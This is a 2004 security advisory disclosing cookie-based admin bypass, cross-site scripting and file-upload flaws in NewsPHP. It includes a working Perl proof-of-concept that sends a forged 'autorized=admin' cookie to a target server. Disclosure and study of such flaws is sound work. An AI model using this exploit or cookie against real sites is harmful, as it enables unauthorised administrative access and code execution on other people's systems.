NewsPHP Admin Access and Cross Site Scripting Vulnerability
|
Date: 2004-04-12
|
Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <mantra@gulo.org>
Product : NewsPHP (All versions)
Source Message Contents :
#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
NewsPHP.
#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All
#Description:
NewsPHP is a perfect solution for creating web publishing system, like
an
online magazine, newspaper, TV/Radio or news portals. It works also as
a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.
#Vulnerabilities:
A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.
A File Upload vulnerability in the Admin panel allow authenticated users
upload arbitrary files instead of a video file.
This product also is vulnerable to the Cross-Site Scripting vulnerability.
#Cookie Vulnerability#
The flaw is caused because cookie data is not properly checked for
administrator rights.
This is the cookie and POC to gain administrator privileges in newsPHP:
### autorized=admin; root=admin ###
## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------
#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm
use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
}
$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];
print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die
"$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin
fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;
##--------------------------
#Cross-Site Scripting#
A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.
/index.php?cat_id=[XSS]
#File Upload vulnerability#
An user with privileges can upload executable code instead of a video
in the
Administration
Panel. Once the code has been uploaded an user can execute the code by
calling the file, this
will be executed with the privileges of the web server.
#Solution:
There is no solution at the moment.
Vendor contacted Apr 3 2004
#Credits:
Manuel Lopez, mantra@gulo.org
|
Search
Advisories
| Backend
